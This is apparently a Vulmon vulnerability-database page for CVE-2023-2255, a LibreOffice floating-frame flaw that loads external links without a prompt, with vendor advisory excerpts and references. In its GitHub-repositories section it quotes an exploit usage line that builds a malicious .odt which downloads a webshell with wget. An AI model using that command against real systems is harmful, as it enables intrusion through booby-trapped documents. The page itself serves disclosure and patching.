Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
NA

CVE-2023-2255

Published: 25/05/2023 Updated: 26/11/2023
CVSS v3 Base Score: 5.3 | Impact Score: 1.4 | Exploitability Score: 3.9
VMScore: 0
Subscribe to Libreoffice

Vulnerability Summary

Improper access control in editor components of The Document Foundation LibreOffice allowed an malicious user to craft a document that would cause external links to be loaded without prompt. In the affected versions of LibreOffice documents that used "floating frames" linked to external files, would load the contents of those frames without prompting the user for permission to do so. This was inconsistent with the treatment of other linked content in LibreOffice. This issue affects: The Document Foundation LibreOffice 7.4 versions before 7.4.7; 7.5 versions before 7.5.3.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

libreoffice libreoffice

debian debian linux 11.0

Vendor Advisories

Red Hat: Moderate: libreoffice security update
Synopsis Moderate: libreoffice security update Type/Severity Security Advisory: Moderate Red Hat Insights patch analysis Identify and remediate systems affected by this advisory View affected systems Topic An update for libreoffice is now available for Red Hat Enterprise Linux 9Red Hat Product Security has rated this update as hav ...
Debian Security Advisories: DSA-5415-1 libreoffice -- security update
Two security issues were discocvered in LibreOffice, which could potentially result in the execution of arbitrary code when loading a malformed spreadsheet document or unacknowlegded loading of linked documents within a floating frame For the stable distribution (bullseye), these problems have been fixed in version 1:704-4+deb11u7 We recommend ...
Red Hat:
Description<!---->A vulnerability was found in LibreOffice Improper access control in the editor components of The Document Foundation in LibreOffice allows an attacker to craft a document that causes external links to load without a prompt In the affected versions of LibreOffice documents that used "floating frames" linked to external files, the ...

Github Repositories

https://github.com/elweth-sec/CVE-2023-2255

CVE-2023-2255 Libre Office

CVE-2023-2255 CVE-2023-2255 RCE &amp; load of external ressources found by @Icare1337 nvdnistgov/vuln/detail/CVE-2023-2255 Exploit Just an example to drop a webshell in current directory python3 CVE-2023-2255py --cmd 'wget rawgithubusercontentcom/elweth-sec/CVE-2023-2255/main/webshellphp' --output 'exploitodt'

https://github.com/Mathieuleto/CVE-2023-2255

exploit from CVE-2023-2255

CVE-2023-2255 exploit from CVE-2023-2255

References

NVD-CWE-Otherhttps://www.libreoffice.org/about-us/security/advisories/CVE-2023-2255https://www.debian.org/security/2023/dsa-5415https://lists.debian.org/debian-lts-announce/2023/08/msg00014.htmlhttps://security.gentoo.org/glsa/202311-15https://access.redhat.com/errata/RHSA-2023:6508https://nvd.nist.govhttps://github.com/elweth-sec/CVE-2023-2255https://www.debian.org/security/2023/dsa-5415
CVSSv2
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2024-4671unauthorizedCVE-2024-4776CVE-2024-3407CVE-2024-26026CVE-2024-32888wirelessCVE-2024-4656template injection
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook